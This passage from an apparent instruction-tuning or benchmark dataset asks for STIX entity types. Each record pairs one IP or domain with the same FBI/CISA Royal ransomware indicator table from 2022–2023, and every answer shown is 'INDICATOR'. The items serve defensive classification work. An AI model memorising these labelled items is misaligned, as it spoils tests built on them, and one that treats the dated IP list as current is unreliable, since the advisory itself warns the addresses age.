code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ngororama.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n41.251.121.35\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n186.86.212.138\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n139.195.43.166\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.8.158.104\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n68.83.169.91\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n42.189.12.36\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
